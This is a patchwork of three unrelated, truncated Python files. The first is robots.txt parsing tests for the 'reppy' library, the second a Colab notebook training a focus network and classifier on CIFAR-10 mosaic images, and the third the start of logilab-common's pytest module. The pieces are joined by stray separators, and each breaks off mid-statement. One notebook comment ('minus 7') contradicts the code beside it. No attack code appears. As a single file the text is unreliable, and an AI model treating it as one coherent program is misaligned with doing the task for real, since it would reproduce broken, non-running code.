"Disallow:\t/folder2/\n" )
rules = self.parse(robots_txt)
self.assertFalse(rules.allowed("/somereallylongfolder/", "reppy"))
self.assertFalse(rules.allowed("/somereallylongfolder/aaaa", "reppy"))
self.assertFalse(rules.allowed("/somereallylongfolder/test.jpg", "reppy"))
self.assertTrue(rules.allowed("/sales-secrets.php", "reppy"))
self.assertTrue(rules.allowed("/folder/page", "reppy"))
self.assertTrue(rules.allowed("/folder/page2", "reppy"))
def test_redundant_allow(self):
robots_txt = ( "User-agent: *\n"
"Disallow: /en/\n"
"Disallow: /files/documentation/\n"
"Disallow: /files/\n"
"Disallow: /de/careers/\n"
"Disallow: /images/\n"
"\n"
"Disallow: /print_mode.yes/\n"
"Disallow: /?product=lutensit&print_mode=yes&googlebot=nocrawl\n"
"Allow: /\n"
"Disallow: /search/\n" )
rules = self.parse(robots_txt)
self.assertFalse(rules.allowed("/print_mode.yes/", "reppy"))
self.assertFalse(rules.allowed("/print_mode.yes/foo", "reppy"))
self.assertFalse(rules.allowed("/search/", "reppy"))
self.assertFalse(rules.allowed("/search/foo", "reppy"))
# Some comments, wildcards, and anchor tests -- this was a legacy test
# ported from urlexclude
def test_legacy_test_1(self):
robots_txt = ( "user-agent: * #a comment!\n"
"disallow: /Blerf\n"
"disallow: /Blerg$\n"
"disallow: /blerf/*/print.html$#a comment\n"
"disallow: /blerf/*/blim/blerf$\n"
"disallow: /plerf/*/blim/blim$\n"
"\tuser-agent: BLERF\n"
" DisALLOW: \tblerfPage\n"
"blerf:blah\n" )
rules = self.parse(robots_txt)
self.assertFalse(rules.allowed("/Blerf/blah", "reppy"))
self.assertTrue(rules.allowed("/Blerg/blah", "reppy"))
self.assertTrue(rules.allowed("/blerf/blah", "reppy"))
self.assertFalse(rules.allowed("/Blerg", "reppy"))
self.assertFalse(rules.allowed("/blerf/some/subdirs/print.html", "reppy"))
self.assertTrue(rules.allowed("/blerf/some/subdirs/print.html?extra=stuff", "reppy"))
self.assertFalse(rules.allowed("/blerf/some/sub/dirs/blim/blim/blerf", "reppy"))
self.assertFalse(rules.allowed("/plerf/some/sub/dirs/blim/blim", "reppy"))
def test_legacy_test_2(self):
robots_txt = ( "User-agent: *\n"
"Allow: /searchhistory/\n"
"Disallow: /news?output=xhtml&\n"
"Allow: /news?output=xhtml\n"
"Disallow: /search\n"
"Disallow: /groups\n"
"Disallow: /images\n"
"Disallow: /catalogs\n"
"Disallow: /catalogues\n"
"Disallow: /news\n"
"Disallow: /nwshp\n"
"Allow: /news?btcid=\n"
"Disallow: /news?btcid=*&\n"
"Allow: /news?btaid=\n"
"Disallow: /news?btaid=*&\n"
"Disallow: /?\n"
"Disallow: /addurl/image?\n"
"Disallow: /pagead/\n"
"Disallow: /relpage/\n"
"Disallow: /relcontent\n"
"Disallow: /sorry/\n"
"Disallow: /imgres\n"
"Disallow: /keyword/\n"
"Disallow: /u/\n"
"Disallow: /univ/\n"
"Disallow: /cobrand\n"
"Disallow: /custom\n"
"Disallow: /advanced_group_search\n"
"Disallow: /advanced_search\n"
"Disallow: /googlesite\n"
"Disallow: /preferences\n"
"Disallow: /setprefs\n"
"Disallow: /swr\n"
"Disallow: /url\n"
"Disallow: /default\n"
"Disallow: /m?\n"
"Disallow: /m/?\n"
"Disallow: /m/lcb\n"
"Disallow: /m/search?\n"
"Disallow: /wml?\n"
"Disallow: /wml/?\n"
"Disallow: /wml/search?\n"
"Disallow: /xhtml?\n"
"Disallow: /xhtml/?\n"
"Disallow: /xhtml/search?\n"
"Disallow: /xml?\n"
"Disallow: /imode?\n"
"Disallow: /imode/?\n"
"Disallow: /imode/search?\n"
"Disallow: /jsky?\n"
"Disallow: /jsky/?\n"
"Disallow: /jsky/search?\n"
"Disallow: /pda?\n"
"Disallow: /pda/?\n"
"Disallow: /pda/search?\n"
"Disallow: /sprint_xhtml\n"
"Disallow: /sprint_wml\n"
"Disallow: /pqa\n"
"Disallow: /palm\n"
"Disallow: /gwt/\n"
"Disallow: /purchases\n"
"Disallow: /hws\n"
"Disallow: /bsd?\n"
"Disallow: /linux?\n"
"Disallow: /mac?\n"
"Disallow: /microsoft?\n"
"Disallow: /unclesam?\n"
"Disallow: /answers/search?q=\n"
"Disallow: /local?\n"
"Disallow: /local_url\n"
"Disallow: /froogle?\n"
"Disallow: /products?\n"
"Disallow: /froogle_\n"
"Disallow: /product_\n"
"Disallow: /products_\n"
"Disallow: /print\n"
"Disallow: /books\n"
"Disallow: /patents?\n"
"Disallow: /scholar?\n"
"Disallow: /complete\n"
"Disallow: /sponsoredlinks\n"
"Disallow: /videosearch?\n"
"Disallow: /videopreview?\n"
"Disallow: /videoprograminfo?\n"
"Disallow: /maps?\n"
"Disallow: /mapstt?\n"
"Disallow: /mapslt?\n"
"Disallow: /maps/stk/\n"
"Disallow: /mapabcpoi?\n"
"Disallow: /translate?\n"
"Disallow: /ie?\n"
"Disallow: /sms/demo?\n"
"Disallow: /katrina?\n"
"Disallow: /blogsearch?\n"
"Disallow: /blogsearch/\n"
"Disallow: /blogsearch_feeds\n"
"Disallow: /advanced_blog_search\n"
"Disallow: /reader/\n"
"Disallow: /uds/\n"
"Disallow: /chart?\n"
"Disallow: /transit?\n"
"Disallow: /mbd?\n"
"Disallow: /extern_js/\n"
"Disallow: /calendar/feeds/\n"
"Disallow: /calendar/ical/\n"
"Disallow: /cl2/feeds/\n"
"Disallow: /cl2/ical/\n"
"Disallow: /coop/directory\n"
"Disallow: /coop/manage\n"
"Disallow: /trends?\n"
"Disallow: /trends/music?\n"
"Disallow: /notebook/search?\n"
"Disallow: /music\n"
"Disallow: /browsersync\n"
"Disallow: /call\n"
"Disallow: /archivesearch?\n"
"Disallow: /archivesearch/url\n"
"Disallow: /archivesearch/advanced_search\n"
"Disallow: /base/search?\n"
"Disallow: /base/reportbadoffer\n"
"Disallow: /base/s2\n"
"Disallow: /urchin_test/\n"
"Disallow: /movies?\n"
"Disallow: /codesearch?\n"
"Disallow: /codesearch/feeds/search?\n"
"Disallow: /wapsearch?\n"
"Disallow: /safebrowsing\n"
"Disallow: /reviews/search?\n"
"Disallow: /orkut/albums\n"
"Disallow: /jsapi\n"
"Disallow: /views?\n"
"Disallow: /c/\n"
"Disallow: /cbk\n"
"Disallow: /recharge/dashboard/car\n"
"Disallow: /recharge/dashboard/static/\n"
"Disallow: /translate_c?\n"
"Disallow: /s2/profiles/me\n"
"Allow: /s2/profiles\n"
"Disallow: /s2\n"
"Disallow: /transconsole/portal/\n"
"Disallow: /gcc/\n"
"Disallow: /aclk\n"
"Disallow: /cse?\n"
"Disallow: /tbproxy/\n"
"Disallow: /MerchantSearchBeta/\n"
"Disallow: /ime/\n"
"Disallow: /websites?\n"
"Disallow: /shenghuo/search?\n" )
rules = self.parse(robots_txt)
self.assertFalse(rules.allowed("/?as_q=ethics&ie=UTF-8&ui=blg&bl_url=centrerion.blogspot.com&x=0&y=0&ui=blg", "reppy"))
# Real world example with several similar disallow rules
def test_legacy_test_3(self):
robots_txt = ( "User-agent: *\n"
"Allow: /searchhistory/\n"
"Disallow: /news?output=xhtml&\n"
"Allow: /news?output=xhtml\n"
"Disallow: /search\n"
"Disallow: /groups\n"
"Disallow: /images\n"
"Disallow: /catalogs\n"
"Disallow: /catalogues\n"
"Disallow: /news\n"
"Disallow: /nwshp\n"
"Allow: /news?btcid=\n"
"Disallow: /news?btcid=*&\n"
"Allow: /news?btaid=\n"
"Disallow: /news?btaid=*&\n"
"Disallow: /?\n"
"Disallow: /addurl/image?\n"
"Disallow: /pagead/\n"
"Disallow: /relpage/\n"
"Disallow: /relcontent\n"
"Disallow: /sorry/\n"
"Disallow: /imgres\n"
"Disallow: /keyword/\n"
"Disallow: /u/\n"
"Disallow: /univ/\n"
"Disallow: /cobrand\n"
"Disallow: /custom\n"
"Disallow: /advanced_group_search\n"
"Disallow: /advanced_search\n"
"Disallow: /googlesite\n"
"Disallow: /preferences\n"
"Disallow: /setprefs\n"
"Disallow: /swr\n"
"Disallow: /url\n"
"Disallow: /default\n"
"Disallow: /m?\n"
"Disallow: /m/?\n"
"Disallow: /m/lcb\n"
"Disallow: /m/search?\n"
"Disallow: /wml?\n"
"Disallow: /wml/?\n"
"Disallow: /wml/search?\n"
"Disallow: /xhtml?\n"
"Disallow: /xhtml/?\n"
"Disallow: /xhtml/search?\n"
"Disallow: /xml?\n"
"Disallow: /imode?\n"
"Disallow: /imode/?\n"
"Disallow: /imode/search?\n"
"Disallow: /jsky?\n"
"Disallow: /jsky/?\n"
"Disallow: /jsky/search?\n"
"Disallow: /pda?\n"
"Disallow: /pda/?\n"
"Disallow: /pda/search?\n"
"Disallow: /sprint_xhtml\n"
"Disallow: /sprint_wml\n"
"Disallow: /pqa\n"
"Disallow: /palm\n"
"Disallow: /gwt/\n"
"Disallow: /purchases\n"
"Disallow: /hws\n"
"Disallow: /bsd?\n"
"Disallow: /linux?\n"
"Disallow: /mac?\n"
"Disallow: /microsoft?\n"
"Disallow: /unclesam?\n"
"Disallow: /answers/search?q=\n"
"Disallow: /local?\n"
"Disallow: /local_url\n"
"Disallow: /froogle?\n"
"Disallow: /products?\n"
"Disallow: /froogle_\n"
"Disallow: /product_\n"
"Disallow: /products_\n"
"Disallow: /print\n"
"Disallow: /books\n"
"Disallow: /patents?\n"
"Disallow: /scholar?\n"
"Disallow: /complete\n"
"Disallow: /sponsoredlinks\n"
"Disallow: /videosearch?\n"
"Disallow: /videopreview?\n"
"Disallow: /videoprograminfo?\n"
"Disallow: /maps?\n"
"Disallow: /mapstt?\n"
"Disallow: /mapslt?\n"
"Disallow: /maps/stk/\n"
"Disallow: /mapabcpoi?\n"
"Disallow: /translate?\n"
"Disallow: /ie?\n"
"Disallow: /sms/demo?\n"
"Disallow: /katrina?\n"
"Disallow: /blogsearch?\n"
"Disallow: /blogsearch/\n"
"Disallow: /blogsearch_feeds\n"
"Disallow: /advanced_blog_search\n"
"Disallow: /reader/\n"
"Disallow: /uds/\n"
"Disallow: /chart?\n"
"Disallow: /transit?\n"
"Disallow: /mbd?\n"
"Disallow: /extern_js/\n"
"Disallow: /calendar/feeds/\n"
"Disallow: /calendar/ical/\n"
"Disallow: /cl2/feeds/\n"
"Disallow: /cl2/ical/\n"
"Disallow: /coop/directory\n"
"Disallow: /coop/manage\n"
"Disallow: /trends?\n"
"Disallow: /trends/music?\n"
"Disallow: /notebook/search?\n"
"Disallow: /music\n"
"Disallow: /browsersync\n"
"Disallow: /call\n"
"Disallow: /archivesearch?\n"
"Disallow: /archivesearch/url\n"
"Disallow: /archivesearch/advanced_search\n"
"Disallow: /base/search?\n"
"Disallow: /base/reportbadoffer\n"
"Disallow: /base/s2\n"
"Disallow: /urchin_test/\n"
"Disallow: /movies?\n"
"Disallow: /codesearch?\n"
"Disallow: /codesearch/feeds/search?\n"
"Disallow: /wapsearch?\n"
"Disallow: /safebrowsing\n"
"Disallow: /reviews/search?\n"
"Disallow: /orkut/albums\n"
"Disallow: /jsapi\n"
"Disallow: /views?\n"
"Disallow: /c/\n"
"Disallow: /cbk\n"
"Disallow: /recharge/dashboard/car\n"
"Disallow: /recharge/dashboard/static/\n"
"Disallow: /translate_c?\n"
"Disallow: /s2/profiles/me\n"
"Allow: /s2/profiles\n"
"Disallow: /s2\n"
"Disallow: /transconsole/portal/\n"
"Disallow: /gcc/\n"
"Disallow: /aclk\n"
"Disallow: /cse?\n"
"Disallow: /tbproxy/\n"
"Disallow: /MerchantSearchBeta/\n"
"Disallow: /ime/\n"
"Disallow: /websites?\n"
"Disallow: /shenghuo/search?\n" )
rules = self.parse(robots_txt)
self.assertFalse(rules.allowed("/archivesearch?q=stalin&scoring=t&hl=en&sa=N&sugg=d&as_ldate=1900&as_hdate=1919&lnav=hist2", "reppy"))
# Real world example
def test_legacy_test_4(self):
robots_txt = ( "User-agent: scooter\n"
"Disallow: /\n"
"\n"
"User-agent: wget\n"
"User-agent: webzip\n"
"Disallow: /\n"
| |
# -*- coding: utf-8 -*-
"""4_focus_random_classify_random_train_classify.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1pHaGvxPWtFJXolLP6BXSnxm-_rZpiWB5
"""
from google.colab import drive
drive.mount('/content/drive')
import torch.nn as nn
import torch.nn.functional as F
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import torch
import torchvision
import torchvision.transforms as transforms
from torch.utils.data import Dataset, DataLoader
from torchvision import transforms, utils
from matplotlib import pyplot as plt
import copy
# Ignore warnings
import warnings
warnings.filterwarnings("ignore")
transform = transforms.Compose(
[transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])
trainset = torchvision.datasets.CIFAR10(root='./data', train=True, download=True, transform=transform)
testset = torchvision.datasets.CIFAR10(root='./data', train=False, download=True, transform=transform)
trainloader = torch.utils.data.DataLoader(trainset, batch_size=10, shuffle=True)
testloader = torch.utils.data.DataLoader(testset, batch_size=10, shuffle=False)
classes = ('plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck')
foreground_classes = {'plane', 'car', 'bird'}
background_classes = {'cat', 'deer', 'dog', 'frog', 'horse','ship', 'truck'}
fg1,fg2,fg3 = 0,1,2
dataiter = iter(trainloader)
background_data=[]
background_label=[]
foreground_data=[]
foreground_label=[]
batch_size=10
for i in range(5000):
images, labels = dataiter.next()
for j in range(batch_size):
if(classes[labels[j]] in background_classes):
img = images[j].tolist()
background_data.append(img)
background_label.append(labels[j])
else:
img = images[j].tolist()
foreground_data.append(img)
foreground_label.append(labels[j])
foreground_data = torch.tensor(foreground_data)
foreground_label = torch.tensor(foreground_label)
background_data = torch.tensor(background_data)
background_label = torch.tensor(background_label)
def create_mosaic_img(bg_idx,fg_idx,fg):
"""
bg_idx : list of indexes of background_data[] to be used as background images in mosaic
fg_idx : index of image to be used as foreground image from foreground data
fg : at what position/index foreground image has to be stored out of 0-8
"""
image_list=[]
j=0
for i in range(9):
if i != fg:
image_list.append(background_data[bg_idx[j]])#.type("torch.DoubleTensor"))
j+=1
else:
image_list.append(foreground_data[fg_idx])#.type("torch.DoubleTensor"))
label = foreground_label[fg_idx]- fg1 # minus 7 because our fore ground classes are 7,8,9 but we have to store it as 0,1,2
#image_list = np.concatenate(image_list ,axis=0)
image_list = torch.stack(image_list)
return image_list,label
desired_num = 30000
mosaic_list_of_images =[] # list of mosaic images, each mosaic image is saved as list of 9 images
fore_idx =[] # list of indexes at which foreground image is present in a mosaic image i.e from 0 to 9
mosaic_label=[] # label of mosaic image = foreground class present in that mosaic
for i in range(desired_num):
np.random.seed(i)
bg_idx = np.random.randint(0,35000,8)
fg_idx = np.random.randint(0,15000)
fg = np.random.randint(0,9)
fore_idx.append(fg)
image_list,label = create_mosaic_img(bg_idx,fg_idx,fg)
mosaic_list_of_images.append(image_list)
mosaic_label.append(label)
class MosaicDataset(Dataset):
"""MosaicDataset dataset."""
def __init__(self, mosaic_list_of_images, mosaic_label, fore_idx):
"""
Args:
csv_file (string): Path to the csv file with annotations.
root_dir (string): Directory with all the images.
transform (callable, optional): Optional transform to be applied
on a sample.
"""
self.mosaic = mosaic_list_of_images
self.label = mosaic_label
self.fore_idx = fore_idx
def __len__(self):
return len(self.label)
def __getitem__(self, idx):
return self.mosaic[idx] , self.label[idx], self.fore_idx[idx]
batch = 250
msd = MosaicDataset(mosaic_list_of_images, mosaic_label , fore_idx)
train_loader = DataLoader( msd,batch_size= batch ,shuffle=True)
# class Focus(nn.Module):
# def __init__(self):
# super(Focus, self).__init__()
# self.conv1 = nn.Conv2d(in_channels=3, out_channels=32, kernel_size=3, padding=0)
# self.conv2 = nn.Conv2d(in_channels=32, out_channels=64, kernel_size=3, padding=0)
# self.conv3 = nn.Conv2d(in_channels=64, out_channels=128, kernel_size=3, padding=0)
# self.conv4 = nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, padding=0)
# self.conv5 = nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, padding=0)
# self.conv6 = nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, padding=1)
# self.pool = nn.MaxPool2d(kernel_size=2, stride=2)
# self.batch_norm1 = nn.BatchNorm2d(32)
# self.batch_norm2 = nn.BatchNorm2d(128)
# self.dropout1 = nn.Dropout2d(p=0.05)
# self.dropout2 = nn.Dropout2d(p=0.1)
# self.fc1 = nn.Linear(128,64)
# self.fc2 = nn.Linear(64, 32)
# self.fc3 = nn.Linear(32, 10)
# self.fc4 = nn.Linear(10, 2)
# def forward(self, x):
# x = self.conv1(x)
# x = F.relu(self.batch_norm1(x))
# x = (F.relu(self.conv2(x)))
# x = self.pool(x)
# x = self.conv3(x)
# x = F.relu(self.batch_norm2(x))
# x = (F.relu(self.conv4(x)))
# x = self.pool(x)
# x = self.dropout1(x)
# x = self.conv5(x)
# x = F.relu(self.batch_norm2(x))
# x = self.conv6(x)
# x1 = F.tanh(x)
# x = F.relu(x)
# x = self.pool(x)
# x = x.view(x.size(0), -1)
# x = self.dropout2(x)
# x = F.relu(self.fc1(x))
# x = F.relu(self.fc2(x))
# x = self.dropout2(x)
# x = F.relu(self.fc3(x))
# x = self.fc4(x)
# return x,x1
class Focus(nn.Module):
def __init__(self,pretrained =True):
super(Focus, self).__init__()
self.conv1 = nn.Conv2d(in_channels=3, out_channels=32, kernel_size=3, padding=0)
self.conv2 = nn.Conv2d(in_channels=32, out_channels=64, kernel_size=3, padding=0)
self.conv3 = nn.Conv2d(in_channels=64, out_channels=128, kernel_size=3, padding=0)
self.conv4 = nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, padding=0)
self.conv5 = nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, padding=0)
self.conv6 = nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, padding=1)
self.pool = nn.MaxPool2d(kernel_size=2, stride=2)
self.batch_norm1 = nn.BatchNorm2d(32)
self.batch_norm2 = nn.BatchNorm2d(128)
self.dropout1 = nn.Dropout2d(p=0.05)
self.dropout2 = nn.Dropout2d(p=0.1)
self.fc1 = nn.Linear(128,64)
self.fc2 = nn.Linear(64, 32)
self.fc3 = nn.Linear(32, 10)
self.fc4 = nn.Linear(10, 2)
self.pretrained = pretrained
def forward(self,z): #y is avg image #z batch of list of 9 images
y = torch.zeros([batch,128, 3,3], dtype=torch.float64)
x = torch.zeros([batch,9],dtype=torch.float64)
ftr = torch.zeros([batch,9,128,3,3])
y = y.to("cuda")
x = x.to("cuda")
ftr = ftr.to("cuda")
for i in range(9):
out,ftrs = self.helper(z[:,i])
#print(out.shape)
x[:,i] = out
ftr[:,i] = ftrs
x = F.softmax(x,dim=1)
# x1 = x[:,0]
# torch.mul(x1[:,None,None,None],z[:,0])
for i in range(9):
x1 = x[:,i]
y = y + torch.mul(x1[:,None,None,None],ftr[:,i])
return x, y #alpha,avg_data
def helper(self, x):
#x1 = x
x = self.conv1(x)
x = F.relu(self.batch_norm1(x))
x = (F.relu(self.conv2(x)))
x = self.pool(x)
x = self.conv3(x)
x = F.relu(self.batch_norm2(x))
x = (F.relu(self.conv4(x)))
x = self.pool(x)
x = self.dropout1(x)
x = self.conv5(x)
x = F.relu(self.batch_norm2(x))
x = self.conv6(x)
x1 = F.tanh(x)
x = F.relu(x)
x = self.pool(x)
x = x.view(x.size(0), -1)
x = self.dropout2(x)
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = self.dropout2(x)
x = F.relu(self.fc3(x))
if self.pretrained==True:
x = self.fc4(x)
x = x[:,1] -x[:,0]
else:
x = self.fc4(x)
x = x[:,0]
return x,x1
focus_net = Focus().double()
focus_net = focus_net.to("cuda")
# focus_net.load_state_dict( torch.load("/content/drive/My Drive/Cheating_data/Focus_net_weights/focus_net_6layer_cnn.pt"))
# print(focus_net.fc4)
# print(focus_net.fc4.weight)
# print(focus_net.fc4.bias)
# temp = focus_net.fc4.weight.data
# temp2 = focus_net.fc4.bias.data
# focus_net.fc4 = nn.Linear(10,1).double()
# focus_net.fc4.weight.data = temp[1,:]-temp[0,:]
# focus_net.fc4.bias.data = temp[1,:]-temp[0,:]
# focus_net = focus_net.to("cuda")
# print(focus_net.fc4.weight)
# print(focus_net.fc4.bias)
"""Changing the last layer of Focus net"""
for params in focus_net.parameters():
params.requires_grad = False
# for params in focus_net.parameters():
# print(params)
# break;
class Classification(nn.Module):
def __init__(self):
super(Classification, self).__init__()
self.conv1 = nn.Conv2d(in_channels=3, out_channels=32, kernel_size=3, padding=1)
self.conv2 = nn.Conv2d(in_channels=32, out_channels=64, kernel_size=3, padding=1)
self.conv3 = nn.Conv2d(in_channels=64, out_channels=128, kernel_size=3, padding=1)
self.conv4 = nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, padding=1)
self.conv5 = nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, padding=1)
self.conv6 = nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, padding=1)
self.pool = nn.MaxPool2d(kernel_size=2, stride=2,padding=1)
self.batch_norm1 = nn.BatchNorm2d(32)
self.batch_norm2 = nn.BatchNorm2d(128)
self.dropout1 = nn.Dropout2d(p=0.05)
self.dropout2 = nn.Dropout2d(p=0.1)
self.global_average_pooling = nn.AvgPool2d(kernel_size=2)
self.fc1 = nn.Linear(128,64)
self.fc2 = nn.Linear(64, 32)
self.fc3 = nn.Linear(32, 10)
self.fc4 = nn.Linear(10, 3)
def forward(self, x):
x = self.conv1(x)
x = F.relu(self.batch_norm1(x))
x = (F.relu(self.conv2(x)))
x = self.pool(x)
x = self.conv3(x)
x = F.relu(self.batch_norm2(x))
x = (F.relu(self.conv4(x)))
x = self.pool(x)
x = self.dropout1(x)
x = self.conv5(x)
x = F.relu(self.batch_norm2(x))
x = (F.relu(self.conv6(x)))
x = self.pool(x)
#print(x.shape)
x = self.global_average_pooling(x)
x = x.squeeze()
#x = x.view(x.size(0), -1)
#print(x.shape)
x = self.dropout2(x)
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = self.dropout2(x)
x = F.relu(self.fc3(x))
x = self.fc4(x)
return x
classify = Classification().double()
classify = classify.to("cuda")
classify.load_state_dict( torch.load("/content/classify_weights.pt"))
classify.conv1 = nn.Conv2d(in_channels=128, out_channels=32, kernel_size=3, padding=1)
classify = classify.double()
classify = classify.to("cuda")
for params in classify.parameters():
params.requires_grad = True
test_images =[] #list of mosaic images, each mosaic image is saved as laist of 9 images
fore_idx_test =[] #list of indexes at which foreground image is present in a mosaic image
test_label=[] # label of mosaic image = foreground class present in that mosaic
for i in range(10000):
np.random.seed(i+30000)
bg_idx = np.random.randint(0,35000,8)
fg_idx = np.random.randint(0,15000)
fg = np.random.randint(0,9)
fore_idx_test.append(fg)
image_list,label = create_mosaic_img(bg_idx,fg_idx,fg)
test_images.append(image_list)
test_label.append(label)
test_data = MosaicDataset(test_images,test_label,fore_idx_test)
test_loader = DataLoader( test_data,batch_size= batch ,shuffle=False)
import torch.optim as optim
criterion_classify = nn.CrossEntropyLoss()
optimizer_focus = optim.SGD(focus_net.parameters(), lr=0.01, momentum=0.9)
optimizer_classify = optim.SGD(classify.parameters(), lr=0.01, momentum=0.9)
col1=[]
col2=[]
col3=[]
col4=[]
col5=[]
col6=[]
col7=[]
col8=[]
col9=[]
col10=[]
col11=[]
col12=[]
col13=[]
correct = 0
total = 0
count = 0
flag = 1
focus_true_pred_true =0
focus_false_pred_true =0
focus_true_pred_false =0
focus_false_pred_false =0
argmax_more_than_half = 0
argmax_less_than_half =0
with torch.no_grad():
for data in train_loader:
inputs, labels , fore_idx = data
inputs = inputs.double()
inputs, labels , fore_idx = inputs.to("cuda"),labels.to("cuda"), fore_idx.to("cuda")
alphas, avg_images = focus_net(inputs)
outputs = classify(avg_images)
_, predicted = torch.max(outputs.data, 1)
for j in range(labels.size(0)):
count += 1
focus = torch.argmax(alphas[j])
if alphas[j][focus] >= 0.5 :
argmax_more_than_half += 1
else:
argmax_less_than_half += 1
if(focus == fore_idx[j] and predicted[j] == labels[j]):
focus_true_pred_true += 1
elif(focus != fore_idx[j] and predicted[j] == labels[j]):
focus_false_pred_true += 1
elif(focus == fore_idx[j] and predicted[j] != labels[j]):
focus_true_pred_false += 1
elif(focus != fore_idx[j] and predicted[j] != labels[j]):
focus_false_pred_false += 1
total += labels.size(0)
correct += (predicted == labels).sum().item()
print('Accuracy of the network on the 30000 train images: %d %%' % ( 100 * correct / total))
print("total correct", correct)
print("total train set images", total)
print("focus_true_pred_true %d =============> FTPT : %d %%" % (focus_true_pred_true , (100 * focus_true_pred_true / total) ) )
print("focus_false_pred_true %d =============> FFPT : %d %%" % (focus_false_pred_true, (100 * focus_false_pred_true / total) ) )
print("focus_true_pred_false %d =============> FTPF : %d %%" %( focus_true_pred_false , ( 100 * focus_true_pred_false / total) ) )
print("focus_false_pred_false %d =============> FFPF : %d %%" % (focus_false_pred_false, ( 100 * focus_false_pred_false / total) ) )
print("argmax_more_than_half ==================> ",argmax_more_than_half)
print("argmax_less_than_half ==================> ",argmax_less_than_half)
print(count)
print("="*100)
col1.append(0)
col2.append(argmax_more_than_half)
col3.append(argmax_less_than_half)
col4.append(focus_true_pred_true)
col5.append(focus_false_pred_true)
col6.append(focus_true_pred_false)
col7.append(focus_false_pred_false)
correct = 0
total = 0
count = 0
flag = 1
focus_true_pred_true =0
focus_false_pred_true =0
focus_true_pred_false | |
<filename>CodeAnalysis/SourceMeter_Interface/SourceMeter-8.2.0-x64-linux/Python/Tools/python/logilab/common/pytest.py<gh_stars>1000+
# copyright 2003-2011 LOGILAB S.A. (Paris, FRANCE), all rights reserved.
# contact http://www.logilab.fr/ -- mailto:<EMAIL>
#
# This file is part of logilab-common.
#
# logilab-common is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the Free
# Software Foundation, either version 2.1 of the License, or (at your option) any
# later version.
#
# logilab-common is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License along
# with logilab-common. If not, see <http://www.gnu.org/licenses/>.
"""pytest is a tool that eases test running and debugging.
To be able to use pytest, you should either write tests using
the logilab.common.testlib's framework or the unittest module of the
Python's standard library.
You can customize pytest's behaviour by defining a ``pytestconf.py`` file
somewhere in your test directory. In this file, you can add options or
change the way tests are run.
To add command line options, you must define a ``update_parser`` function in
your ``pytestconf.py`` file. The function must accept a single parameter
that will be the OptionParser's instance to customize.
If you wish to customize the tester, you'll have to define a class named
``CustomPyTester``. This class should extend the default `PyTester` class
defined in the pytest module. Take a look at the `PyTester` and `DjangoTester`
classes for more information about what can be done.
For instance, if you wish to add a custom -l option to specify a loglevel, you
could define the following ``pytestconf.py`` file ::
import logging
from logilab.common.pytest import PyTester
def update_parser(parser):
parser.add_option('-l', '--loglevel', dest='loglevel', action='store',
choices=('debug', 'info', 'warning', 'error', 'critical'),
default='critical', help="the default log level possible choices are "
"('debug', 'info', 'warning', 'error', 'critical')")
return parser
class CustomPyTester(PyTester):
def __init__(self, cvg, options):
super(CustomPyTester, self).__init__(cvg, options)
loglevel = options.loglevel.upper()
logger = logging.getLogger('erudi')
logger.setLevel(logging.getLevelName(loglevel))
In your TestCase class you can then get the value of a specific option with
the ``optval`` method::
class MyTestCase(TestCase):
def test_foo(self):
loglevel = self.optval('loglevel')
# ...
You can also tag your tag your test for fine filtering
With those tag::
from logilab.common.testlib import tag, TestCase
class Exemple(TestCase):
@tag('rouge', 'carre')
def toto(self):
pass
@tag('carre', 'vert')
def tata(self):
pass
@tag('rouge')
def titi(test):
pass
you can filter the function with a simple python expression
* ``toto`` and ``titi`` match ``rouge``
* ``toto``, ``tata`` and ``titi``, match ``rouge or carre``
* ``tata`` and ``titi`` match``rouge ^ carre``
* ``titi`` match ``rouge and not carre``
"""
from __future__ import print_function
__docformat__ = "restructuredtext en"
PYTEST_DOC = """%prog [OPTIONS] [testfile [testpattern]]
examples:
pytest path/to/mytests.py
pytest path/to/mytests.py TheseTests
pytest path/to/mytests.py TheseTests.test_thisone
pytest path/to/mytests.py -m '(not long and database) or regr'
pytest one (will run both test_thisone and test_thatone)
pytest path/to/mytests.py -s not (will skip test_notthisone)
"""
ENABLE_DBC = False
FILE_RESTART = ".pytest.restart"
import os, sys, re
import os.path as osp
from time import time, clock
import warnings
import types
from inspect import isgeneratorfunction, isclass
from contextlib import contextmanager
from logilab.common.fileutils import abspath_listdir
from logilab.common import textutils
from logilab.common import testlib, STD_BLACKLIST
# use the same unittest module as testlib
from logilab.common.testlib import unittest, start_interactive_mode
from logilab.common.deprecation import deprecated
import doctest
import unittest as unittest_legacy
if not getattr(unittest_legacy, "__package__", None):
try:
import unittest2.suite as unittest_suite
except ImportError:
sys.exit("You have to install python-unittest2 to use this module")
else:
import unittest.suite as unittest_suite
try:
import django
from logilab.common.modutils import modpath_from_file, load_module_from_modpath
DJANGO_FOUND = True
except ImportError:
DJANGO_FOUND = False
CONF_FILE = 'pytestconf.py'
## coverage pausing tools
@contextmanager
def replace_trace(trace=None):
"""A context manager that temporary replaces the trace function"""
oldtrace = sys.gettrace()
sys.settrace(trace)
try:
yield
finally:
# specific hack to work around a bug in pycoverage, see
# https://bitbucket.org/ned/coveragepy/issue/123
if (oldtrace is not None and not callable(oldtrace) and
hasattr(oldtrace, 'pytrace')):
oldtrace = oldtrace.pytrace
sys.settrace(oldtrace)
def pause_trace():
"""A context manager that temporary pauses any tracing"""
return replace_trace()
class TraceController(object):
ctx_stack = []
@classmethod
@deprecated('[lgc 0.63.1] Use the pause_trace() context manager')
def pause_tracing(cls):
